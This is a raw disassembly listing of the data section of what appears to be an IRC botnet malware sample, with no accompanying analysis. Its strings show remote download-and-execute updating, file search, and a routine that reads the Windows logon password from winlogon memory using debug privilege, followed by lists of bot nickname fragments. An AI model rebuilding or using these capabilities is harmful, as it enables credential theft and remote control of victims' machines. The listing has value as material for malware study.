unk_44E830 db 2Dh ; - ; DATA XREF: sub_416D25+83�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorUnableToW db '- error unable to write file to disk',0
align 10h
; char aAB[]
aAB db 'a+b',0 ; DATA XREF: sub_416D25+97�o
unk_44E864 db 2Dh ; - ; DATA XREF: sub_416D25+AB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorOpeningFi db '- error opening file for writing',0
align 10h
; char asc_44E890[]
asc_44E890 db '-' ; DATA XREF: sub_416D25+CB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aErrorOpeningSo db '- error opening socket',0
; char asc_44E8B0[]
asc_44E8B0 db '-' ; DATA XREF: sub_416D25+156�o
db 3, 34h, 2
dd 2636364h, 73202D03h, 656B636Fh, 72652074h, 726F72h
; char asc_44E8C8[]
asc_44E8C8 db '-' ; DATA XREF: sub_416D25+1D1�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceivedSFromS db '- received %s from %s (%s bytes).',0
align 4
; char asc_44E8F4[]
asc_44E8F4 db '-' ; DATA XREF: sub_416F62+77�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aCouldnTOpenF_0 db 'couldn',27h,'t open file: %s',0
align 4
unk_44E91C db 2Dh ; - ; DATA XREF: sub_416F62+183�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloadedSDkb db 'downloaded %s (%dKB)',0
align 4
; char asc_44E944[]
asc_44E944 db '-' ; DATA XREF: sub_416F62+195�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aGotUpdateSDkb_ db 'got update %s (%dKB).',0
align 4
; char asc_44E96C[]
asc_44E96C db '-' ; DATA XREF: sub_416F62+1D8�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aWrongFilesizeD db 'wrong filesize (%d != %d).',0
align 4
; char asc_44E998[]
asc_44E998 db '-' ; DATA XREF: sub_416F62+262�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aWrongCrcDD_ db 'wrong crc (%d != %d).',0
align 10h
; char asc_44E9C0[]
asc_44E9C0 db '-' ; DATA XREF: sub_416F62+2E1�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloaded_1fK db 'downloaded %.1f KB to %s @ %.1f KB/sec',0
align 4
aOpen_2 db 'open',0 ; DATA XREF: sub_416F62+336�o
align 10h
; char asc_44EA00[]
asc_44EA00 db '-' ; DATA XREF: sub_416F62+358�o
db 3, 34h, 2
dd 6E776F64h, 64616F6Ch, 202D0302h, 6E65706Fh, 25206465h
dd 73h
; char asc_44EA1C[]
asc_44EA1C db '-' ; DATA XREF: sub_416F62+3C9�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aDownloaded_1fk db 'downloaded %.1fKB to %s @ %.1fKB/sec, updating bot',0
align 10h
unk_44EA60 db 2Dh ; - ; DATA XREF: sub_416F62+485�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aUpdateFailedEr db 'update failed, error executing %s',0
align 4
; char asc_44EA94[]
asc_44EA94 db '-' ; DATA XREF: sub_416F62+493�o
db 3, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 2
db 3, 2Dh, 20h
aBadUrlOrDnsErr db 'bad url or dns error at %s.',0
aUnknown db 'Unknown',0 ; DATA XREF: sub_41750A:loc_41754D�o
aInvalid db 'Invalid',0 ; DATA XREF: sub_41750A:loc_417547�o
aDisk db 'Disk',0 ; DATA XREF: sub_41750A:loc_417541�o
align 4
aNetwork db 'Network',0 ; DATA XREF: sub_41750A:loc_41753B�o
aCdrom db 'Cdrom',0 ; DATA XREF: sub_41750A:loc_417535�o
align 4
off_44EAE8 dd offset word_4D4152 ; DATA XREF: sub_41750A:loc_41752F�o
dword_44EAEC dd 3Fh ; DATA XREF: sub_41750A+1F�o
; char aFailed[]
aFailed db 'failed',0 ; DATA XREF: sub_41759B+E9�o
align 4
; char aFailed_0[]
aFailed_0 db 'failed',0 ; DATA XREF: sub_41759B+FC�o
align 10h
; char aFailed_1[]
aFailed_1 db 'failed',0 ; DATA XREF: sub_41759B+10F�o
align 4
; char aSkb[]
aSkb db '%sKB',0 ; DATA XREF: sub_41759B+72�o
align 10h
; char aSkb_0[]
aSkb_0 db '%sKB',0 ; DATA XREF: sub_41759B+9F�o
align 4
; char aSkb_1[]
aSkb_1 db '%sKB',0 ; DATA XREF: sub_41759B+CC�o
align 10h
; char aFailed_2[]
aFailed_2 db 'failed',0 ; DATA XREF: sub_4176CB+3B�o
align 4
; char asc_44EB28[]
asc_44EB28 db '-' ; DATA XREF: sub_4176CB+58�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aSDriveSFailedT db '%s drive (%s): failed to stat, device not ready',0
; char asc_44EB64[]
asc_44EB64 db '-' ; DATA XREF: sub_4176CB+8E�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aSDriveSSTotalS db '%s drive (%s): %s total, %s free, %s available',0
align 10h
; char aA_1[]
aA_1 db 'A:\',0 ; DATA XREF: sub_41779D:loc_4177E2�o
; char asc_44EBA4[]
asc_44EBA4 db '-' ; DATA XREF: sub_417822+5C�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 66h ; f
db 69h, 6Ch, 65h
db 2
db 3, 2Dh, 20h
aSearchingFor_0 db 'searching for file %s',0
align 4
; char asc_44EBCC[]
asc_44EBCC db '-' ; DATA XREF: sub_417822+C8�o
db 3, 34h, 2
dd 646E6966h, 656C6966h, 202D0302h, 6E756F66h, 64252064h
dd 6C696620h, 7365h
; char aS_29[]
aS_29 db '%s\*',0 ; DATA XREF: sub_41793D+1A�o
align 4
; char aSS_9[]
aSS_9 db '%s\%s',0 ; DATA XREF: sub_41793D+7A�o
align 4
; char aSS_10[]
aSS_10 db '%s\%s',0 ; DATA XREF: sub_41793D+CE�o
align 4
; char asc_44EC04[]
asc_44EC04 db '-' ; DATA XREF: sub_41793D+107�o
db 3, 34h, 2
dd 646E6966h, 656C6966h, 202D0302h, 6E756F66h, 73252064h
dd 73255Ch
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_417A8B+40�o
align 4
aNtdll_dll db 'NTDLL.DLL',0 ; DATA XREF: sub_417A8B+55�o
align 10h
aNtquerysystemi db 'NtQuerySystemInformation',0 ; DATA XREF: sub_417A8B+68�o
align 4
aRtlcreatequery db 'RtlCreateQueryDebugBuffer',0 ; DATA XREF: sub_417A8B+73�o
align 4
aRtlqueryproces db 'RtlQueryProcessDebugInformation',0 ; DATA XREF: sub_417A8B+80�o
aRtldestroyquer db 'RtlDestroyQueryDebugBuffer',0 ; DATA XREF: sub_417A8B+8D�o
align 4
aRtlrundecodeun db 'RtlRunDecodeUnicodeString',0 ; DATA XREF: sub_417A8B+9A�o
align 10h
aUsername: ; DATA XREF: sub_417A8B+CE�o
unicode 0, <USERNAME>,0
align 4
aUserdomain: ; DATA XREF: sub_417A8B+DC�o
unicode 0, <USERDOMAIN>,0
align 4
; char asc_44ECFC[]
asc_44ECFC db '-' ; DATA XREF: sub_417A8B+117�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
db 57h ; W
db 69h, 6Eh, 4Ch
db 6Fh ; o
db 67h, 6Fh, 6Eh
db 20h
db 49h, 6Eh, 66h
db 6Fh ; o
db 72h, 6Dh, 61h
db 74h ; t
db 69h, 6Fh, 6Eh
db 20h
db 28h, 50h, 49h
db 44h ; D
db 20h, 25h, 64h
db 29h ; )
db 20h, 2Dh, 20h
db 2
db 44h, 6Fh, 6Dh
db 61h ; a
db 69h, 6Eh, 2
db 3Ah ; :
db 20h, 2 dup(5Ch)
db 25h ; %
db 53h, 2Ch, 20h
db 2
db 55h, 73h, 65h
db 72h ; r
db 2, 3Ah, 20h
aSNoPassword_ db '(%S/(no password)).',0
unk_44ED58 db 2Dh ; - ; DATA XREF: sub_417A8B:loc_417BD0�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aUnableToFindTh db 'unable to find the password in memory',0
align 10h
; char asc_44ED90[]
asc_44ED90 db '-' ; DATA XREF: sub_417A8B:loc_417BD7�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aUnableToFindWi db 'unable to find winlogon pid',0
aSedebugprivi_0 db 'SeDebugPrivilege',0 ; DATA XREF: sub_417A8B+161�o
align 10h
; char asc_44EDD0[]
asc_44EDD0 db '-' ; DATA XREF: sub_417A8B:loc_417C04�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aFailedToEnable db 'failed to enable debug privilege',0
align 4
unk_44EE04 db 2Dh ; - ; DATA XREF: sub_417A8B+35�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aOnlySupportedO db 'only supported on winnt/win2k',0
align 4
; char aWinlogon[]
aWinlogon db 'WINLOGON',0 ; DATA XREF: sub_417C5D+AF�o
align 10h
; char aNwgina[]
aNwgina db 'NWGINA',0 ; DATA XREF: sub_417C5D+123�o
align 4
; char aMsgina[]
aMsgina db 'MSGINA',0 ; DATA XREF: sub_417C5D+13E�o
align 10h
; char asc_44EE50[]
asc_44EE50 db '-' ; DATA XREF: sub_4180C3+70�o
db 3, 34h, 2
dd 646E6966h, 73736170h, 202D0302h, 4C6E6957h, 6E6F676Fh
dd 666E4920h, 616D726Fh, 6E6F6974h, 49502820h, 64252044h
dd 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah, 202C5325h
dd 65735502h, 203A0272h, 2F532528h, 295325h
; char asc_44EEA0[]
asc_44EEA0 db '-' ; DATA XREF: sub_41815A+C7�o
db 3, 34h, 2
dd 646E6966h, 73736170h, 202D0302h, 4C6E6957h, 6E6F676Fh
dd 666E4920h, 616D726Fh, 6E6F6974h, 49502820h, 64252044h
dd 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah, 202C5325h
dd 65735502h, 203A0272h, 2F532528h, 295325h
; char asc_44EEF0[]
asc_44EEF0 db '-' ; DATA XREF: sub_41815A+E1�o
db 3, 34h, 2
dd 646E6966h, 73736170h, 202D0302h, 4C6E6957h, 6E6F676Fh
dd 666E4920h, 616D726Fh, 6E6F6974h, 49502820h, 64252044h
dd 202D2029h, 6D6F4402h, 26E6961h, 5C5C203Ah, 202C5325h
dd 65735502h, 203A0272h, 2F532528h, 412F4E28h, 2929h
; char *off_44EF44
off_44EF44 dd offset dword_44F3DC ; DATA XREF: sub_418650+5C�r
dd offset dword_44F3E0
dd offset dword_44F3E4
dd offset dword_44F3E8
dd offset dword_44F3EC
dd offset dword_44F3F0
dd offset dword_44F3F4
dd offset dword_44F3F8
dd offset dword_44F3FC
dd offset dword_44F400
dd offset dword_44F404
dd offset dword_44F408
dd offset dword_44F40C
dd offset dword_44F410
dd offset dword_44F414
dd offset dword_44F418
dd offset dword_44F41C
dd offset dword_44F420
dd offset dword_44F424
dd offset dword_44F428
dd offset dword_44F42C
dd offset dword_44F430
dd offset dword_44F434
dd offset dword_44F438
dd offset dword_44F43C
dd offset dword_44F440
dd offset dword_44F444
dd offset dword_44F448
dd offset dword_44F44C
dd offset dword_44F450
dd offset dword_44F454
dd offset dword_44F458
dd offset dword_44F45C
dd offset dword_44F460
dd offset dword_44F464
dd offset dword_44F468
dd offset dword_44F46C
dd offset dword_44F470
dd offset dword_44F474
dd offset dword_44F478
dd offset dword_44F47C
dd offset dword_44F480
dd offset dword_44F484
dd offset dword_44F488
dd offset dword_44F48C
dd offset dword_44F490
dd offset dword_44F494
dd offset dword_44F498
dd offset dword_44F49C
dd offset dword_44F4A0
dd offset dword_44F4A4
dd offset aSmartmir ; "SMARTMIR"
dd offset aFarooq ; "farooq"
dd offset aMaxxguy ; "maxxguy"
dd offset aBobmarley ; "BOBMARLEY"
dd offset aEmilya ; "emilya"
dd offset aKrizha ; "KRIZHA"
dd offset aCar1nna ; "Car1nna"
dd offset aSwin ; "swin"
dd offset aMale ; "male"
dd offset aKoko ; "koko"
dd offset aFlexster ; "flexster"
dd offset aKen ; "ken"
dd offset aShez ; "Shez"
dd offset aTalika ; "talika"
dd offset aMarcy ; "marcy"
dd offset aCme ; "cme"
dd offset aHeval ; "heval"
dd offset aBunty ; "bunty"
dd offset aJanno ; "janno"
dd offset aRimpy ; "rimpy"
dd offset aNastysha ; "nastysha"
dd offset aLuisa ; "Luisa"
dd offset aTroller ; "troller"
dd offset aManee ; "manee"
dd offset aKermit ; "kermit"
dd offset aPuregold ; "puregold"
dd offset aCoredump ; "CoreDump"
dd offset aImra ; "imra"
dd offset aGirl ; "GirL"
dd offset aCamel ; "CAMEL"
dd offset aReshma ; "reshma"
dd offset aKencing ; "Kencing"
dd offset aThr45h3r5 ; "THR45H3R5"
dd offset aCansuuuu ; "cansuuuu"
dd offset aKaan38dent ; "kaan38dent"
dd offset aErkan27 ; "erkan27"
dd offset aHexaaa ; "hexaaa"
dd offset aBerk19 ; "berk19"
dd offset aObenibisevse ; "OBeNiBiSeVSe"
dd offset aIrmal ; "irmal"
dd offset aMisssunday ; "misssunday"
dd offset aTolga34 ; "Tolga34"
dd offset aJericho ; "JERICHO"
dd offset aMary_0 ; "MARY"
dd offset aAkin ; "AKIN"
dd offset aMelekk ; "melekk"
dd offset aTrend3 ; "trend3"
dd offset aMERVE ; "M-E-R-V-E"
dd offset aTekir ; "tekir"
dd offset aVenedik34 ; "venedik34"
dd offset aSevmekmi ; "sevmekmi"
dd offset aSudenur ; "SUDENUR"
dd offset aArzu ; "ARZU"
dd offset aHaticem ; "haticem"
dd offset aErnesto ; "ERNESTO"
dd offset aAslii ; "aslii"
dd offset aPiramit ; "PIRAMIT"
dd offset aSamyeli21 ; "samyeli21"
dd offset aRetg ; "RETG"
dd offset aBlackpearl ; "blackpearl"
dd offset aPelincik ; "pelincik"
dd offset aAhmet ; "ahmet"
dd offset aTurkyy ; "turkyy"
dd offset aAnk32m ; "ank32m"
dd offset aZack ; "ZACK"
dd offset aIzmir39m ; "Izmir39m"
dd offset aAlbina ; "albina"
dd offset aAyla ; "AYLA-"
dd offset off_44F70C
dd offset aAnkh ; "ankh"
dd offset aDonjuanm ; "Donjuanm"
dd offset aBogac ; "bogac"
dd offset aAlpay34m ; "alpay34m"
dd offset aCongueror ; "CoNGuERoR"
dd offset aDenizlim ; "DenizliM"
dd offset aBerk19m ; "Berk19m"
dd offset aDevran ; "devran"
dd offset aArda ; "arda"
dd offset aKeyiflisert ; "keyifliSERT"
dd offset aMurat34M ; "murat34-m"
dd offset aHakan3 ; "hakan3"
dd offset aImirzali ; "IMIRZALI--"
dd offset aRamtha ; "RAMTHA"
dd offset aEmre ; "Emre--"
dd offset aElmaazyok ; "elmaazyok"
dd offset aEsmerkiz ; "Esmerkiz"
dd offset aKebikec ; "kebikec"
dd offset aFlord ; "FLoRD"
dd offset aHoly ; "holy"
dd offset aMahinur ; "MAHINUR"
dd offset aSadikaellesme ; "SaDIkaEllesme"
dd offset aAykut1 ; "aykut1"
dd offset aKashmira ; "Kashmira"
dd offset aSeviseli ; "SeViSeLi"
dd offset aSugarboy ; "SUGARBOY-"
dd offset aUzgun36 ; "uzgun36"
dd offset aKumul ; "kumul"
dd offset aAdalim ; "ADALIM"
dd offset aUmut ; "umut-"
dd offset aAnk32M ; "ANK-32-M"
dd offset aDjspace ; "DJSPACE"
dd offset aAnkar ; "Ankar"
dd offset aFenerlee ; "FeNeRLee"
dd offset aHayran ; "hayran"
dd offset aAngelgirl ; "angelgirl"
dd offset aKapk ; "kapk"
dd offset aAchilles ; "Achilles"
dd offset aTegmen ; "TEGMEN"
dd offset aKotan ; "kotan"
dd offset aSevda ; "sevda"
dd offset off_44F8A0
dd offset aAlcatras ; "alcatras"
dd offset aA44m ; "a44m"
dd offset aBirsen ; "birsen"
dd offset aYabanc ; "yabanc"
dd offset aDevre ; "devre"
dd offset aErkan ; "erkan"
dd offset aAnkm ; "ankM"
dd offset aAdem28 ; "Adem28"
dd offset aMaxsilla ; "maxsilla"
dd offset aM41ist ; "M41IST"
dd offset aAdamm33 ; "AdAMM33"
dd offset aFirtina ; "firtina"
dd offset aAta29 ; "Ata29"
dd offset aKoray ; "KORAY"
dd offset aAkden ; "akden"
dd offset aIzmirlm ; "izmirlm"
dd offset aUla ; "ula"
dd offset aNeHaber ; "NE-HABER"
dd offset aPassenger ; "passenger"
dd offset aTropikal ; "tropikal"
dd offset aCool30m ; "cool30m"
dd offset aCem39 ; "cem39"
dd offset aRerpjj ; "RERPJJ"
dd offset aTeoman ; "TEOMAN```"
dd offset aDallas43m ; "DALLAS43M"
dd offset aPrometheus ; "prometheus"
dd offset aMaveRIck ; "MaVe{R}icK"
dd offset aAdamm ; "ADAMM"
dd offset aCumhur29 ; "cumhur29"
dd offset aWantedlove ; "WANTEDLOVE"
; char *off_44F244
off_44F244 dd offset aSex_1 ; DATA XREF: sub_418650+41�r
; sub_418650+EC�r
; "sex"
dd offset aLez ; "lez"
dd offset aZex ; "zex"
dd offset aTree ; "tree"
dd offset aBad ; "bad"
dd offset aLag ; "lag"
dd offset aTambe ; "|tambe|"
dd offset aWoh ; "|woh|"
dd offset aTot ; "-|tot|"
dd offset aSuck ; "|suck|"
dd offset aLuck ; "|luck|"
dd offset aHub ; "{hub}"
dd offset aSex_0 ; "{sex}"
dd offset aGens ; "{gens|"
dd offset aLuvuF ; "||luvu-f|"
dd offset aWiked ; "|wiked|"
dd offset aSick ; "sick}}"
dd offset aQ8 ; "Q8"
dd offset aQ8A ; "|q8|a"
dd offset aB ; "b"
dd offset aC_4 ; "c"
dd offset aD_2 ; "d"
dd offset aE_0 ; "e"
dd offset aF ; "f"
dd offset aG ; "g"
dd offset asc_44FA58 ; "h"
dd offset aI_1 ; "i"
dd offset a__11 ; "_"
dd offset aJ_1 ; "j"
dd offset aK_0 ; "k"
dd offset asc_44FA6C ; "l"
dd offset aM_2 ; "m"
dd offset aN_0 ; "n"
dd offset aO_0 ; "o"
dd offset aP_0 ; "p"
dd offset aQ_0 ; "q"
dd offset aRs ; "rs"
dd offset aT_0 ; "t"
dd offset aU_0 ; "u"
dd offset aV_0 ; "v"
dd offset aW ; "w"
dd offset asc_44FA98 ; "x"
dd offset aY ; "y"
dd offset aZ ; "z"
dd offset aHappy ; "happy"
dd offset aRg ; "rg"
dd offset aTy ; "ty"
dd offset aGf ; "gf"
dd offset aRt ; "rt"
dd offset aSdf ; "sdf"
dd offset aUi ; "ui"
dd offset aLuvy ; "luvy"
dd offset aTrimy ; "trimy"
dd offset aTruck ; "truck"
dd offset aMuckc ; "muckc"
dd offset aZ_0 ; "z"
dd offset aG_0 ; "g"
dd offset aS_39 ; "s"
dd offset aQ_1 ; "q"
dd offset aBrb ; "BRB"
dd offset aBbl ; "|bbl"
dd offset dword_4F2964
dd offset dword_4F2968
dd offset a___0 ; "_|_"
dd offset dword_4F296C
dd offset dword_4F2970
dd offset dword_4F2974
dd offset dword_4F2978
dd offset aF_0 ; "F"
dd offset aM_3 ; "M"
dd offset aLuvu ; "LUVU"
dd offset aSad ; "Sad"
dd offset aF_1 ; "^^^f^"
dd offset aB_0 ; "b"
dd offset dword_4F297C
dd offset aSleeping ; "Sleeping"
dd offset dword_4F2980
dd offset dword_4F2984
dd offset aFuck_0 ; "Fuck"
dd offset aFree_0 ; "Free"
dd offset dword_4F2988
dd offset dword_4F298C
dd offset asc_44FB40 ; "X"
dd offset dword_4F2990
dd offset aBoy ; "BOY"
dd offset aGirl_0 ; "GIRL"
dd offset aGurl ; "gurl"
dd offset aShit ; "shit"
dd offset aAha ; "aha"
dd offset aYeah ; "yeah"
dd offset aMuha ; "muha"
dd offset aMof0 ; "mof0"
dd offset aMofo ; "mofo"
dd offset aTot_0 ; "tot"
dd offset aLol ; "lol"
dd offset aLoloA ; "lolo|a|"
dd offset aSex4free ; "|sex4free|"
dd offset a4us ; "|4us|"
dd offset a4you ; "{4you}"
dd offset a4u ; "|4u|"
dd offset a5u ; "5u"
dd offset a6u ; "6u"
dword_44F3DC dd 71h ; DATA XREF: .data:off_44EF44�o
dword_44F3E0 dd 77h ; DATA XREF: .data:0044EF48�o
dword_44F3E4 dd 65h ; DATA XREF: .data:0044EF4C�o
dword_44F3E8 dd 72h ; DATA XREF: .data:0044EF50�o
dword_44F3EC dd 74h ; DATA XREF: .data:0044EF54�o
dword_44F3F0 dd 79h ; DATA XREF: .data:0044EF58�o
dword_44F3F4 dd 75h ; DATA XREF: .data:0044EF5C�o
dword_44F3F8 dd 69h ; DATA XREF: .data:0044EF60�o
dword_44F3FC dd 70h ; DATA XREF: .data:0044EF64�o
dword_44F400 dd 61h ; DATA XREF: .data:0044EF68�o
dword_44F404 dd 73h ; DATA XREF: .data:0044EF6C�o
dword_44F408 dd 64h ; DATA XREF: .data:0044EF70�o
dword_44F40C dd 66h ; DATA XREF: .data:0044EF74�o
dword_44F410 dd 67h ; DATA XREF: .data:0044EF78�o
dword_44F414 dd 68h ; DATA XREF: .data:0044EF7C�o
dword_44F418 dd 6Ah ; DATA XREF: .data:0044EF80�o
dword_44F41C dd 6Bh ; DATA XREF: .data:0044EF84�o
dword_44F420 dd 6Ch ; DATA XREF: .data:0044EF88�o
dword_44F424 dd 7Ah ; DATA XREF: .data:0044EF8C�o
dword_44F428 dd 78h ; DATA XREF: .data:0044EF90�o
dword_44F42C dd 63h ; DATA XREF: .data:0044EF94�o
dword_44F430 dd 76h ; DATA XREF: .data:0044EF98�o
dword_44F434 dd 62h ; DATA XREF: .data:0044EF9C�o
dword_44F438 dd 6Eh ; DATA XREF: .data:0044EFA0�o
dword_44F43C dd 6Dh ; DATA XREF: .data:0044EFA4�o
dword_44F440 dd 51h ; DATA XREF: .data:0044EFA8�o
dword_44F444 dd 57h ; DATA XREF: .data:0044EFAC�o
dword_44F448 dd 45h ; DATA XREF: .data:0044EFB0�o
dword_44F44C dd 52h ; DATA XREF: .data:0044EFB4�o
dword_44F450 dd 54h ; DATA XREF: .data:0044EFB8�o
dword_44F454 dd 59h ; DATA XREF: .data:0044EFBC�o
dword_44F458 dd 55h ; DATA XREF: .data:0044EFC0�o
dword_44F45C dd 49h ; DATA XREF: .data:0044EFC4�o
dword_44F460 dd 4Fh ; DATA XREF: .data:0044EFC8�o
dword_44F464 dd 50h ; DATA XREF: .data:0044EFCC�o
dword_44F468 dd 41h ; DATA XREF: .data:0044EFD0�o
dword_44F46C dd 53h ; DATA XREF: .data:0044EFD4�o
dword_44F470 dd 44h ; DATA XREF: .data:0044EFD8�o
dword_44F474 dd 46h ; DATA XREF: .data:0044EFDC�o
dword_44F478 dd 47h ; DATA XREF: .data:0044EFE0�o
dword_44F47C dd 48h ; DATA XREF: .data:0044EFE4�o
dword_44F480 dd 4Ah ; DATA XREF: .data:0044EFE8�o
dword_44F484 dd 4Bh ; DATA XREF: .data:0044EFEC�o
dword_44F488 dd 4Ch ; DATA XREF: .data:0044EFF0�o
dword_44F48C dd 5Ah ; DATA XREF: .data:0044EFF4�o
dword_44F490 dd 58h ; DATA XREF: .data:0044EFF8�o
dword_44F494 dd 43h ; DATA XREF: .data:0044EFFC�o
dword_44F498 dd 56h ; DATA XREF: .data:0044F000�o
dword_44F49C dd 42h ; DATA XREF: .data:0044F004�o
dword_44F4A0 dd 4Eh ; DATA XREF: .data:0044F008�o
dword_44F4A4 dd 4Dh ; DATA XREF: .data:0044F00C�o
aSmartmir db 'SMARTMIR',0 ; DATA XREF: .data:0044F010�o
align 4
aFarooq db 'farooq',0 ; DATA XREF: .data:0044F014�o
align 4
aMaxxguy db 'maxxguy',0 ; DATA XREF: .data:0044F018�o
aBobmarley db 'BOBMARLEY',0 ; DATA XREF: .data:0044F01C�o
align 10h
aEmilya db 'emilya',0 ; DATA XREF: .data:0044F020�o
align 4
aKrizha db 'KRIZHA',0 ; DATA XREF: .data:0044F024�o
align 10h
aCar1nna db 'Car1nna',0 ; DATA XREF: .data:0044F028�o
aSwin db 'swin',0 ; DATA XREF: .data:0044F02C�o
align 10h
aMale db 'male',0 ; DATA XREF: .data:0044F030�o
align 4
aKoko db 'koko',0 ; DATA XREF: .data:0044F034�o
align 10h
aFlexster db 'flexster',0 ; DATA XREF: .data:0044F038�o
align 4
aKen db 'ken',0 ; DATA XREF: .data:0044F03C�o
aShez db 'Shez',0 ; DATA XREF: .data:0044F040�o
align 4
aTalika db 'talika',0 ; DATA XREF: .data:0044F044�o
align 10h
aMarcy db 'marcy',0 ; DATA XREF: .data:0044F048�o
align 4
aCme db 'cme',0 ; DATA XREF: .data:0044F04C�o
aHeval db 'heval',0 ; DATA XREF: .data:0044F050�o
align 4
aBunty db 'bunty',0 ; DATA XREF: .data:0044F054�o
align 4
aJanno db 'janno',0 ; DATA XREF: .data:0044F058�o
align 4
aRimpy db 'rimpy',0 ; DATA XREF: .data:0044F05C�o
align 4
aNastysha db 'nastysha',0 ; DATA XREF: .data:0044F060�o
align 4
aLuisa db 'Luisa',0 ; DATA XREF: .data:0044F064�o
align 10h
aTroller db 'troller',0 ; DATA XREF: .data:0044F068�o
aManee db 'manee',0 ; DATA XREF: .data:0044F06C�o
align 10h
aKermit db 'kermit',0 ; DATA XREF: .data:0044F070�o
align 4
aPuregold db 'puregold',0 ; DATA XREF: .data:0044F074�o
align 4
aCoredump db 'CoreDump',0 ; DATA XREF: .data:0044F078�o
align 10h
aImra db 'imra',0 ; DATA XREF: .data:0044F07C�o
align 4
aGirl db 'GirL',0 ; DATA XREF: .data:0044F080�o
align 10h
aCamel db 'CAMEL',0 ; DATA XREF: .data:0044F084�o
align 4
aReshma db 'reshma',0 ; DATA XREF: .data:0044F088�o
align 10h
aKencing db 'Kencing',0 ; DATA XREF: .data:0044F08C�o
aThr45h3r5 db 'THR45H3R5',0 ; DATA XREF: .data:0044F090�o
align 4
aCansuuuu db 'cansuuuu',0 ; DATA XREF: .data:0044F094�o
align 10h
aKaan38dent db 'kaan38dent',0 ; DATA XREF: .data:0044F098�o
align 4
aErkan27 db 'erkan27',0 ; DATA XREF: .data:0044F09C�o
aHexaaa db 'hexaaa',0 ; DATA XREF: .data:0044F0A0�o
align 4
aBerk19 db 'berk19',0 ; DATA XREF: .data:0044F0A4�o
align 4
aObenibisevse db 'OBeNiBiSeVSe',0 ; DATA XREF: .data:0044F0A8�o
align 4
aIrmal db 'irmal',0 ; DATA XREF: .data:0044F0AC�o
align 4
aMisssunday db 'misssunday',0 ; DATA XREF: .data:0044F0B0�o
align 4
aTolga34 db 'Tolga34',0 ; DATA XREF: .data:0044F0B4�o
aJericho db 'JERICHO',0 ; DATA XREF: .data:0044F0B8�o
aMary_0 db 'MARY',0 ; DATA XREF: .data:0044F0BC�o
align 10h
aAkin db 'AKIN',0 ; DATA XREF: .data:0044F0C0�o
align 4
aMelekk db 'melekk',0 ; DATA XREF: .data:0044F0C4�o
align 10h
aTrend3 db 'trend3',0 ; DATA XREF: .data:0044F0C8�o
align 4
aMERVE db 'M-E-R-V-E',0 ; DATA XREF: .data:0044F0CC�o
align 4
aTekir db 'tekir',0 ; DATA XREF: .data:0044F0D0�o
align 4
aVenedik34 db 'venedik34',0 ; DATA XREF: .data:0044F0D4�o
align 4
aSevmekmi db 'sevmekmi',0 ; DATA XREF: .data:0044F0D8�o
align 4
aSudenur db 'SUDENUR',0 ; DATA XREF: .data:0044F0DC�o
aArzu db 'ARZU',0 ; DATA XREF: .data:0044F0E0�o
align 4
aHaticem db 'haticem',0 ; DATA XREF: .data:0044F0E4�o
aErnesto db 'ERNESTO',0 ; DATA XREF: .data:0044F0E8�o
aAslii db 'aslii',0 ; DATA XREF: .data:0044F0EC�o
align 4
aPiramit db 'PIRAMIT',0 ; DATA XREF: .data:0044F0F0�o
aSamyeli21 db 'samyeli21',0 ; DATA XREF: .data:0044F0F4�o
align 10h
aRetg db 'RETG',0 ; DATA XREF: .data:0044F0F8�o
align 4
aBlackpearl db 'blackpearl',0 ; DATA XREF: .data:0044F0FC�o
align 4
aPelincik db 'pelincik',0 ; DATA XREF: .data:0044F100�o
align 10h
aAhmet db 'ahmet',0 ; DATA XREF: .data:0044F104�o
align 4
aTurkyy db 'turkyy',0 ; DATA XREF: .data:0044F108�o
align 10h
aAnk32m db 'ank32m',0 ; DATA XREF: .data:0044F10C�o
align 4
aZack db 'ZACK',0 ; DATA XREF: .data:0044F110�o
align 10h
